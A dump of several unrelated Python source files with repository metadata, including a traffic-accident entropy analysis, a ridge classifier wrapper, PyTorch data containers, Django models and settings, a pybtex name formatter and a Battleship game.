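#     H(subj | col_k) = sum_{i,j} p(i,j) * log(p(i) / p(i,j)),
# and `mic` is the mutual information normalized by the smaller marginal
# entropy, (h_x + h_y - h_xy) / min(h_x, h_y), which lies in [0, 1].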
def analyze_table(col_names, values, subj):
col_values = analyze_columns(col_names, values)
count_table = build_count_table(col_values, col_names, values, subj)
compute_entropy(count_table, col_names, subj)
def analyze_person_accident(conn, cur):
cur.execute("PRAGMA table_info(PERSON)")
c1 = cur.fetchall()
cur.execute("PRAGMA table_info(ACCIDENT)")
c2 = cur.fetchall()
cur.execute('select * from PERSON JOIN ACCIDENT where PERSON.CASENUM == ACCIDENT.CASENUM')
res = cur.fetchall()
cols = map(lambda t: t[1], c1) + map(lambda t: t[1], c2)
analyze_table(cols, res, 'INJ_SEV')
if __name__ == '__main__':
conn = sqlite3.connect('traffic.db')
conn.text_factory = str
cur = conn.cursor()
analyze_person_accident(conn, cur)
cur.close()
conn.close()
|
[
"chnttlp@gmail.com"
] |
chnttlp@gmail.com
|
edcede7c435a63d0e75eb252da4cc153f45acc02
|
68f04671ed3e2aeb2032a4fdecbede89cf9e1832
|
/ridge.py
|
de8b2783a7c235dd6d36114b04259136a70ee35a
|
[] |
no_license
|
sushuang9210/machine_learning_algorithms
|
306c3fa086326cefd2c463f5d16cbe9829abc447
|
4aac5c664816612b1d4f078f5b7a548474bb9534
|
refs/heads/master
| 2020-03-18T17:07:35.444194
| 2018-06-11T04:18:25
| 2018-06-11T04:18:25
| 135,007,939
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
import numpy as np
from sklearn.linear_model import RidgeClassifier
class Ridge:
def __init__(self,data_1,data_2,model_parameters):
self.clf = RidgeClassifier(tol=float(model_parameters[0]), solver=model_parameters[1])
num_data_1 = data_1.shape[0]
num_data_2 = data_2.shape[0]
data_1[:,-1] = np.ones((num_data_1))
data_2[:,-1] = np.zeros((num_data_2))
self.train_set = np.concatenate((data_1, data_2),axis=0)
np.random.shuffle(self.train_set)
self.X_train = self.train_set[:,0:-1]
self.y_train = self.train_set[:,-1]
def ridge_train(self):
self.clf.fit(self.X_train,self.y_train)
def ridge_predict(self,test):
output_1 = self.clf.predict(test)
output_2 = np.ones((test.shape[0])) - output_1
return output_1, output_2
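# Usage sketch (hypothetical arrays; note the constructor overwrites the last
# column of each class's data with the 1/0 label, and model_parameters is
# e.g. ['0.001', 'auto'] for (tol, solver)):
#
#     model = Ridge(class1_data, class2_data, ['0.001', 'auto'])
#     model.ridge_train()
#     p_class1, p_class2 = model.ridge_predict(X_test)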
|
[
"sushuang9210@gmail.com"
] |
sushuang9210@gmail.com
|
fde0cdf4ea3b11cec022c1c518b01a1f0e60eabc
|
4559036e4b91f064c85214276a526ed566107f1f
|
/surname_rnn/surname/containers.py
|
0a8b4fc2b42148f674fa2146ee9800ea9e96f927
|
[
"Apache-2.0"
] |
permissive
|
sudarshan85/nlpbook
|
f55017e5ec0d20f0bf5816438835322a8eff70e4
|
41e59d706fb31f5185a0133789639ccffbddb41f
|
refs/heads/master
| 2020-04-28T01:49:42.739340
| 2019-05-03T16:09:08
| 2019-05-03T16:09:08
| 174,873,977
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,614
|
py
|
#!/usr/bin/env python
import pandas as pd
from pathlib import Path
from torch.utils.data import DataLoader
class ModelContainer(object):
def __init__(self, model, optimizer, loss_fn, scheduler=None):
self.model = model
self.optimizer = optimizer
self.loss_fn = loss_fn
self.scheduler = scheduler
class DataContainer(object):
def __init__(self, df_with_split: pd.DataFrame, dataset_class, vectorizer_file: Path, batch_size:
int, with_test=True, is_load: bool=True) -> None:
self.train_df = df_with_split.loc[df_with_split['split'] == 'train']
self.val_df = df_with_split.loc[df_with_split['split'] == 'val']
self._bs = batch_size
self.with_test = with_test
self.is_load = is_load
self._lengths = {'train_size': len(self.train_df), 'val_size': len(self.val_df)}
self._n_batches = [self._lengths['train_size'] // self._bs, self._lengths['val_size'] //
self._bs]
if not self.is_load:
print("Creating and saving vectorizer")
train_ds = dataset_class.load_data_and_create_vectorizer(self.train_df)
train_ds.save_vectorizer(vectorizer_file)
self.train_ds = dataset_class.load_data_and_vectorizer_from_file(self.train_df, vectorizer_file)
self.vectorizer = self.train_ds.vectorizer
self.surname_vocab = self.vectorizer.surname_vocab
self.nationality_vocab = self.vectorizer.nationality_vocab
self.train_dl = DataLoader(self.train_ds, self._bs, shuffle=True, drop_last=True)
self.val_ds = dataset_class.load_data_and_vectorizer(self.val_df, self.vectorizer)
self.val_dl = DataLoader(self.val_ds, self._bs, shuffle=True, drop_last=True)
if self.with_test:
self.test_df = df_with_split.loc[df_with_split['split'] == 'test']
self._lengths['test_size'] = len(self.test_df)
self._n_batches.append(self._lengths['test_size'] // self._bs)
self.test_ds = dataset_class.load_data_and_vectorizer(self.test_df, self.vectorizer)
self.test_dl = DataLoader(self.test_ds, self._bs, shuffle=True, drop_last=True)
    def get_loaders(self):
        if not self.with_test:
            return self.train_dl, self.val_dl
        return self.train_dl, self.val_dl, self.test_dl
@property
def train_batches(self):
return self._n_batches[0]
@property
def val_batches(self):
return self._n_batches[1]
@property
def test_batches(self):
if not self.with_test:
raise NameError("No test dataset was provided")
return self._n_batches[2]
@property
def vocab_size(self):
return len(self.surname_vocab)
@property
def n_classes(self):
return len(self.nationality_vocab)
@property
def sizes(self):
return self._lengths
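# Usage sketch (SurnameDataset and the file names are hypothetical):
#
#     dc = DataContainer(df, SurnameDataset, Path('vectorizer.json'),
#                        batch_size=64, with_test=True, is_load=False)
#     train_dl, val_dl, test_dl = dc.get_loaders()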
|
[
"su0@ornl.gov"
] |
su0@ornl.gov
|
adaa3bcc2f1130b6551be40f14ba5bf15c68f983
|
5117ae47abf2b1c72c5c808b39048ae2686be0f9
|
/listings/models.py
|
6b8b3acddd8045715c14f5018ba637bdbbdbed0d
|
[] |
no_license
|
nayanpsharma/nayan_property_project
|
a7cc18bbedccf7f12b7bde16658898581ad02146
|
1ef766444696b3049f6e630e6c6a9b75d779c2b4
|
refs/heads/master
| 2022-12-18T21:57:47.426545
| 2020-09-18T21:16:26
| 2020-09-18T21:16:26
| 296,731,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,445
|
py
|
from django.db import models
from datetime import datetime
from realtors.models import Realtor
class Listing(models.Model):
realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
title = models.CharField(max_length=200)
address = models.CharField(max_length=200)
city = models.CharField(max_length=100)
state = models.CharField(max_length=100)
zipcode = models.CharField(max_length=20)
description = models.TextField(blank=True)
price = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
garage = models.IntegerField(default=0)
sqft = models.IntegerField()
lot_size = models.DecimalField(max_digits=5, decimal_places=1)
photo_main = models.ImageField(upload_to='photos/%Y%m/%d/')
photo_1 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_2 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_3 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_4 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_5 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
photo_6 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
is_published = models.BooleanField(default=True)
list_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.title
|
[
"nayansharma996@gmail.com"
] |
nayansharma996@gmail.com
|
62ab32f13bfb48de1118f28c062ed0d2f5702325
|
6e5c83baa19e09bcc59300d764ce936f8cbe6b5b
|
/pybtex/style/names/plain.py
|
62c0c2ca311b0e086a1a078c4410d14d84d02f38
|
[
"MIT"
] |
permissive
|
rybesh/pybtex
|
84e10b12f6c9ade0de2af638bfc23945109eff6d
|
18e0b5336f07ebc5dc97aa899362fb292ea7bb5a
|
refs/heads/master
| 2016-08-07T20:15:26.865726
| 2011-03-18T18:03:48
| 2011-03-18T18:03:48
| 1,246,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,441
|
py
|
# Copyright (c) 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from pybtex.style.template import join
from pybtex.style.names import BaseNameStyle, name_part
class NameStyle(BaseNameStyle):
name = 'plain'
def format(self, person, abbr=False):
r"""
Format names similarly to {ff~}{vv~}{ll}{, jj} in BibTeX.
>>> from pybtex.core import Person
>>> name = Person(string=r"Charles Louis Xavier Joseph de la Vall{\'e}e Poussin")
>>> plain = NameStyle().format
>>> print plain(name).format().plaintext()
Charles Louis Xavier<nbsp>Joseph de<nbsp>la Vall{\'e}e<nbsp>Poussin
>>> print plain(name, abbr=True).format().plaintext()
C.<nbsp>L. X.<nbsp>J. de<nbsp>la Vall{\'e}e<nbsp>Poussin
>>> name = Person(first='First', last='Last', middle='Middle')
>>> print plain(name).format().plaintext()
First<nbsp>Middle Last
>>> print plain(name, abbr=True).format().plaintext()
F.<nbsp>M. Last
>>> print plain(Person('de Last, Jr., First Middle')).format().plaintext()
First<nbsp>Middle de<nbsp>Last, Jr.
"""
return join [
name_part(tie=True) [person.first(abbr) + person.middle(abbr)],
name_part(tie=True) [person.prelast()],
name_part [person.last()],
name_part(before=', ') [person.lineage()]
]
|
[
"ryanshaw@ischool.berkeley.edu"
] |
ryanshaw@ischool.berkeley.edu
|
32b358403cf8563ce1aad3ed0d74d9abb0359e78
|
c5edd407319c80640ed4e2819838fec94ee7a345
|
/raterz/settings.py
|
31ebd662a31757c7cdfd225ed059c47ef34cb724
|
[
"MIT"
] |
permissive
|
OwenMur21/raterz
|
41abece2ac878932a36367b3e12482a9c34ac68c
|
2e028e1fbb8832d90731fec10d5c3401b543384c
|
refs/heads/master
| 2020-04-01T01:31:08.865849
| 2018-10-17T04:48:41
| 2018-10-17T04:48:41
| 152,741,989
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,577
|
py
|
import os
import django_heroku
import dj_database_url
from decouple import config, Csv
MODE = config("MODE", default="dev")
SECRET_KEY = config('SECRET_KEY')
DEBUG = config('DEBUG', default=False, cast=bool)
# development
if MODE == "dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
# 'HOST': config('DB_HOST'),
# 'PORT': '',
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
ALLOWED_HOSTS = ['*']
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pro.apps.ProConfig',
'bootstrap3',
'rest_framework',
'rest_framework.authtoken',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'raterz.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
WSGI_APPLICATION = 'raterz.wsgi.application'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
)
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
django_heroku.settings(locals())
|
[
"owenmuriithi@gmail.com"
] |
owenmuriithi@gmail.com
|
1dccfb0f90cf749916c6492d1e8a811a652e9e72
|
39b916e8969712a31195586ba6666744342b0fcf
|
/inheritance.py
|
b94276e67bcb37d6bdd1c591fbef51731a5cbdf0
|
[] |
no_license
|
bhumphris/Inheritance
|
165391f1e4125d63d6fd7bb7447fb3860f52020a
|
e61a833c9b4eb49981fa91db31b53b7f450cfc03
|
refs/heads/master
| 2020-06-13T15:48:09.292442
| 2016-12-02T05:27:28
| 2016-12-02T05:27:28
| 75,363,130
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
import officeFurniture
def main():
desk = officeFurniture.Desk("Desk", "Metal", 48, 20, 36, 2, "Left", 3, 155.50)
print("Product: " + desk.get_category())
print("Material: " + desk.get_material())
print("Length: " + str(desk.get_length()))
print("Width: " + str(desk.get_width()))
print("Height: " + str(desk.get_height()))
print("Number of Drawers: " + str(desk.get_drawers()))
print("Location of Drawers: " + desk.get_location())
print("Quantity: " + str(desk.get_quantity()))
print("Price: ${:0,.2f}\n".format(desk.get_price()))
    print(desk)
main()
|
[
"noreply@github.com"
] |
bhumphris.noreply@github.com
|
df0a60238544af1eabcce7960d656b63097a4e40
|
d98b0d74639be1b7fdd737b4ddb6938d74157865
|
/mysite/settings.py
|
7e61b134ea0d195d268887d0a08fef0772a4b465
|
[] |
no_license
|
sebastiansilbernagl/djangogirls-blog
|
e70d2d673be67145fc8cc12cde3d7dba5a9e5bf9
|
15df60e2af4dadf01165efe6817dea2f6a7e2c65
|
refs/heads/master
| 2020-05-23T10:14:35.840139
| 2017-01-30T12:52:44
| 2017-01-30T12:52:44
| 80,407,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,232
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '4)r8d1vo+6v4a&940f7t53g9cozbz9)(^8cbi--m5qe5hju%2l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'sebsilbernagl.pythonanywhere.com', 'localhost',]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Johannesburg'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"sebastian.silbernagl@gmail.com"
] |
sebastian.silbernagl@gmail.com
|
797ecbc116b4a0204337d20868dc1e94f0595a59
|
d74cf31046b9cf7d6ea77ab3e9ed1f293beabeb9
|
/charts_analyzer.py
|
b1f4b099e9a0a8ed64b168ca5700f71a0350beed
|
[] |
no_license
|
sampurkiss/song_features
|
789c6ad01455528af3c7c667218301ee8d1312b2
|
6ab81b4059645c143c1be478e335146283e85c73
|
refs/heads/master
| 2020-05-06T20:00:00.832903
| 2019-06-02T03:59:50
| 2019-06-02T03:59:50
| 180,215,794
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,847
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 3 13:05:13 2019
@author: Sam Purkiss
"""
import os
os.chdir('C:/Users/sam purkiss/Documents/Code/Music/')
import pandas as pd
import spotipy
import re
from spotipy.oauth2 import SpotifyClientCredentials
from credentials import CLIENT_ID,CLIENT_SECRET
#Need to create a credentials file with your spotify api keys
client_credentials_manager = SpotifyClientCredentials(CLIENT_ID,CLIENT_SECRET)
spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
names_giving_probs = ['21 savage & metro boomin featuring future',
'21 savage, offset metro boomin ring quavo',
'21 savage, offset metro boomin ring travis scott',
'Dont Trust Me',
'Hit It Again',
'a r rahman & the pussycat dolls featuring nicole scherzinger',
'A Change Is Gonna Come',
'\'N Sync']
def get_music_features(artist_name, song_name):
"""
Spotify API caller to pull features for individual tracks.
Paramaters:
artist_name: name of artist
song_name: song by artist of interest
Returns: Pandas dataframe with variables identified in the API documentation:
https://developer.spotify.com/documentation/web-api/reference/tracks/get-audio-features/
Usage:
client_credentials_manager = SpotifyClientCredentials(CLIENT_ID,CLIENT_SECRET)
spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
song_features = get_music_features('the cure','Friday im in love')
"""
#Use these lists to fix common problems in naming conventions
words_to_remove = ['&.+',
'featuring.+',#the .+ is a regex expression that
# will strip off words following the main word.
#Eg "Alvin And The Chipmunks Featuring Chris Classic"
#becomes just "Alvin And The Chipmunks." This is
#necessary because Spotify search often has a hard time
#finding songs with multiple featured artists.
#This may cause an issue where songs that are have versions
#with and without different artists aren't distinguished
#between
'feat..+',
'feat.+',
'with.+',
'(?<= )[\+](?= ).+',
'duet',
'(?<= )[xX](?= )',
#note that this will only strip the x away if there's
#an x with spaces on both sides
"'",
'\*',
"\(",
"\)"
]
words_to_remove_from_songs =["'",
'[a-zA-Z]+(\*)+(?P<named_group>).+(?= )',#used for capturing
#words that are censored eg N***s,
'\([a-zA-Z]+.+\)' #remove any words in brackets
]
artist = artist_name.lower()
song = song_name
for word in words_to_remove:
artist = re.sub(word,'',artist)
for word in words_to_remove_from_songs:
song = re.sub(word,'', song)
#Generate database used to hold returned items
song_details= pd.DataFrame()
try:
query = 'track:%s artist:%s' %(song,artist)
result = spotify.search(q=query)
#Select the first item (assume spotify returns what I want on first result)
first_result = result['tracks']['items'][0]
#From first result, pull specific variables
track_id = first_result['id']
album_id = first_result['album']['id']
artist_id = first_result['artists'][0]['id']
release_date = first_result['album']['release_date']
#Add variables to dataframe
song_details['Performer'] = [artist_name]
song_details['Song'] = [song_name]
song_details['track_id'] = [track_id]
song_details['artist_id'] = [artist_id]
song_details['album_id'] = [album_id]
song_details['release_date'] = [release_date]
song_details['search_query'] = [query]
track_features = spotify.audio_features(tracks=track_id)
if len(track_features)>1:
print('multiple songs are returned for some reason')
track_features = track_features[0]
for key, value in track_features.items():
song_details[key] = [value]
except IndexError: #for few weird ones + cases where song isn't on spotify
print("Search term \"%s\" is giving trouble" %(query))
pass
return(song_details)
|
[
"samuelpurkiss@gmail.com"
] |
samuelpurkiss@gmail.com
|
79db44dd6ae283d024b6f0487e48e369d2b2d272
|
83eadd220a58329ad7fdb6a223dcc02cb9e6dd81
|
/load_discussions.py
|
67d431ff934d2ae0fe8c1580dd8f0a00309eba1c
|
[] |
no_license
|
LironRS/anyway
|
7d49a1d994d3685d62acf6e3435a38c9f58b0c35
|
813283a0c4fe966f1752d0e2e85aa30c6fad7693
|
refs/heads/master
| 2021-01-15T09:09:12.309208
| 2015-05-19T12:21:22
| 2015-05-19T12:21:22
| 35,944,465
| 0
| 0
| null | 2015-05-20T11:42:39
| 2015-05-20T11:42:39
| null |
UTF-8
|
Python
| false
| false
| 977
|
py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
from models import DiscussionMarker
import re
from datetime import datetime
from database import db_session
def main():
parser = argparse.ArgumentParser()
parser.add_argument('identifiers', type=str, nargs='+',
help='Disqus identifiers to create markers for')
args = parser.parse_args()
for identifier in args.identifiers:
        m = re.match(r'\((\d+\.\d+),\s*(\d+\.\d+)\)', identifier)
if not m:
print("Failed processing: " + identifier)
continue
(latitude, longitude) = m.group(1, 2)
marker = DiscussionMarker.parse({
'latitude': latitude,
'longitude': longitude,
'title': identifier,
'identifier': identifier
})
db_session.add(marker)
db_session.commit()
print("Added: " + identifier)
if __name__ == "__main__":
main()
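# Example invocation (a sketch; each identifier must match the
# "(latitude, longitude)" pattern parsed by the regex above):
#
#     python load_discussions.py "(32.0853, 34.7818)" "(31.7683, 35.2137)"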
|
[
"daniel.hershcovich@gmail.com"
] |
daniel.hershcovich@gmail.com
|
d591cfa31e9c148bfac88be4aefee2acdd0a8266
|
fc39e431bcf4ead647b3c4a2b8fb8dc772928852
|
/Indoor_Webapp_B/Indoor_Webapp_B/Indoor_Webapp_B/manage.py
|
eec6c95947e4ab94a6f3118584215b324c299e0c
|
[
"BSD-3-Clause"
] |
permissive
|
DavidTF85/IndooeAir-Webapp-B
|
c129414be094c39a00fa397e4eed16dc39f7bb14
|
579f7593116d743e566e16219370c98e2937844b
|
refs/heads/master
| 2020-09-12T08:32:24.099793
| 2019-11-18T05:24:55
| 2019-11-18T05:24:55
| 222,369,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 656
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Indoor_Webapp_B.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
DavidTF85.noreply@github.com
|
1da5693613af676b6218173be8e0870435f4b8b1
|
7b695f34ee8a45f7609064ec47e861825f2d96a8
|
/week4/multiplication.py
|
4b2154562589d72befaaa62da3ad7cee1620d82a
|
[] |
no_license
|
deciduously/cmit135
|
de0c151c3642f25ecc6ef76d299d46b7810c753e
|
a74544f529a654e499ef34d6ca1a35c0b5cd71d2
|
refs/heads/master
| 2020-04-19T06:19:55.122853
| 2019-02-28T00:13:41
| 2019-02-28T00:13:41
| 168,014,573
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 827
|
py
|
# multiplication.py pretty prints a multiplication table
# Function to return the number of digits a number n has
def num_digits(n):
# Converts it to a string a counts the length - the math way would work too but this is easy
return len(str(n))
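# (The math way mentioned above, for n > 0: 1 + int(math.log10(n)),
# after an `import math`.)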
def draw_table(n):
    # calculate this outside the loop so we don't recompute it every iteration
total_size = n*n
    for i in range(1, n + 1):          # n + 1 so the table actually reaches n
        for j in range(1, n + 1):
# Print the product of the indices
current_cell = i*j
# Use the size difference betwene the max value and the current value to determine current cell padding
padding = ' ' * (1 + num_digits(total_size) -
num_digits(current_cell))
print(padding + str(i*j), end="")
print()
# draw with 10
draw_table(10)
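# With the inclusive ranges above, draw_table(3) would print:
#  1 2 3
#  2 4 6
#  3 6 9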
|
[
"ben@deciduously.com"
] |
ben@deciduously.com
|
3523fe1ae052b3f169f7bc74db4e83be9b2377c2
|
40afc1f3790099d2d5270503d101f30c71a89f07
|
/usersys/views/user.py
|
d4c9af3172aaa675d041cfa02bcb920867dd7649
|
[] |
no_license
|
fhydralisk/reviewing
|
a3d31af1e8fe8caf2e831b35816d638ac0cadcce
|
7a27f278f85f9fdbcc805b0290f6bbdbb7147609
|
refs/heads/master
| 2020-05-14T23:27:37.229343
| 2019-05-07T12:28:21
| 2019-05-07T12:28:21
| 181,997,119
| 0
| 2
| null | 2019-05-07T07:38:14
| 2019-04-18T01:49:53
|
Python
|
UTF-8
|
Python
| false
| false
| 431
|
py
|
from base.views import WLAPIGenericView
from ..serializers import user as user_serializers
from ..funcs import user as user_funcs
class UserView(WLAPIGenericView):
http_method_names = ['get', 'patch', 'options']
API_SERIALIZER = {
'patch': user_serializers.UserPartialUpdateSerializer
}
RESULT_SERIALIZER = {
'get': user_serializers.UserDetailSerializer
}
FUNC_CLASS = user_funcs.UserFunc
|
[
"fhy14@mails.tsinghua.edu.cn"
] |
fhy14@mails.tsinghua.edu.cn
|
2690dfe618649e308a0dc47ef332ab5e56e29930
|
84c38b838ca74cf80fe276d272537b1b840bfe6d
|
/Battleship.py
|
6ff503cc58f958d7415b052af718a3ad315768e3
|
[] |
no_license
|
Chruffman/Personal-Projects
|
9c385a145e02661cf0dddc76d6f2b5034a6a35f9
|
d271573b4e48c3026d0cc09d4483c218bc3dfa97
|
refs/heads/master
| 2021-01-21T05:17:07.536173
| 2018-07-24T13:37:50
| 2018-07-24T13:37:50
| 83,166,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,247
|
py
|
# my attempt at the Battleship! assignment from codecademy.com
from random import randint
board = []
for quadrant in range(6):
board.append(['O'] * 6)
def display_board(board):
for row in board:
print (" ".join(row))
print ("Let's play Battleship!")
display_board(board)
def new_row(board):
return randint(0, len(board) - 1)
def new_col(board):
return randint(0, len(board) - 1)
game_row = new_row(board)
game_col = new_col(board)
# Debug output: reveals the hidden ship's coordinates (handy while testing)
print (game_col)
print (game_row)
guess = 0
for guess in range(5):
guess += 1
user_row = int(input("Guess row: "))
user_col = int(input("Guess column: "))
if user_row == game_row and user_col == game_col:
print ("You sunk my battleship! Curses!!")
print ("You win!")
break
else:
if user_row not in range(6) or user_col not in range(6):
print ("Your guess is not even in the ocean. Maybe improve your aim?")
elif board[user_row][user_col] == 'X':
print ("You have already unsuccessfully guessed that sector of the game board.")
else:
if guess == 5:
print ("Game Over.")
else:
print ("You missed my battleship!")
board[user_row][user_col] = 'X'
print ("Guess", guess + 1)
display_board(board)
|
[
"noreply@github.com"
] |
Chruffman.noreply@github.com
|
4ec6a82a97d5f6196307fc39b56522e1fa8b4f01
|
a1e01939dfb63139271b137620f57a55420f8dbe
|
/utils/path_helper.py
|
85715b225a360b44fe77bf61e8fa0ca6a7f65723
|
[
"BSD-3-Clause"
] |
permissive
|
KindRoach/NARRE-Pytorch
|
839becc7128a5875e6dbcab62eafea914b3b7c4f
|
14fec7e623e36350e43d24e2629297ab0d308170
|
refs/heads/master
| 2023-06-01T02:56:03.323533
| 2023-05-22T13:32:23
| 2023-05-22T13:32:23
| 270,171,507
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
